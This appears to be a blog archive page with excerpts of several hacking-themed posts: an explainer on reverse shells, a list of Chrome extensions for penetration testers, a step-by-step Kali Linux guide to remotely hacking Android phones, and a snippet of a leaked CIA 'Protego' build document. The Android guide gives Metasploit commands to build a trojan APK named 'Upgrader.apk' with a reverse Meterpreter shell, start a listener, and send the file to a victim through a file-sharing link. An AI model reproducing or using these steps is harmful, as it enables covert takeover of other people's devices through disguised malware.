Posts

Showing posts from February, 2022

Extending the Language with a Malware API

Creating a Remote Reverse Shell Tunnel Attackers use remote shells to connect to their victim's remote machine using an interactive shell. Remote shells enable an attacker to execute OS commands as though he were sitting in front of the victim's machine, and execute commands on behalf of the victim's identity on which the shell's process is running. Telnet and RSH are two examples of “legitimate” services that enable remote clients to connect to another machine and execute commands via the shell's console. Those “direct” or “forward” remote shells are established by the client to the server (the server must, of course, listen to those requests and decide whether to accept them). From an attacker's point of view, it is beneficial to be able to connect to a remote machine and execute OS-level commands. After breaking into a machine, the attacker can set a remote shell server on the machine so that he can establish connections to the machine at a late

Usefull Google Chrome Extensions For Penetration Testers & Security Researcher 2022

1. Web Developer  is a Google Chrome extension that adds a tool bar with various web development tools in Chrome. With these tools, users can perform various web development tasks. This extension helps analyzing web application elements like HTML and JS..                                                                   Add Web Developer Extension in Chrome here    2. Firebug Lite for Google Chrome  provides a rich visual environment to analyze HTML elements, DOM elements and other Box Model Shading. It also provides live CSS editing. It helps in analyzing how an application is working on the client’s side.Add Firebug Lite to Google Chrome: 3. d3coder, is another nice Google Chrome extension that helps penetration testers. It enables us to encode and decode selected text via context menu. Thus it reduces the time to encode and decode strings by using separate tools. This extension can perform a wide range of functions. See the list below: Timestamp decoding rot13 en-/decodi

How To Remotely Hack Android Device Using Kali Linux

Step 1      Fire-Up Kali:   Open a terminal, and make a Trojan .apk   You can do this by typing :   msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)   Step 2      Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3      Set-Up a Listener: After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external) Step 4      Exploit! At last type: exploit t o start the listener. Copy the application that you made (Upgrader.apk) from the root folder, to you android phone. Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com ). Then send the link that

CIA LEAKED HACKING TOOL - PROTEGO

Building the Protego Images  SECRET//NOFORN Building the Protego Images Introduction This document describes the builds required for a complete Protego system. Processor images built for the Protego system: There are seven build images created for a complete Protego system. The following build images are unique for each Collar, Tube, and Missile set and the keys must match: 1) P1.X.production.hex 2) P2.X.production.hex 3) P3.X.production.hex The following are used on the Deployment Box for configuration control of any Protego system: 4) P4.X.production.hex 5) P5.X.production.hex The following build images are used when reprogramming the MP processor: 6) P1_S.X.production.hex 7) P2_ Maintenance.production.hex Locations of images: 1) P1 - Master Processor (MP), Master Processor on PWA 2) P1_S - Master Processor (MP), Slave Processor on PWA 3) P2 - Tube Smart Switch (TSS) Processor 4) P3 - Missile Smart Switch (MSS) Processor 5) P4 - Deployment Box Slave Processor on PWA 6) P5 - Deploymen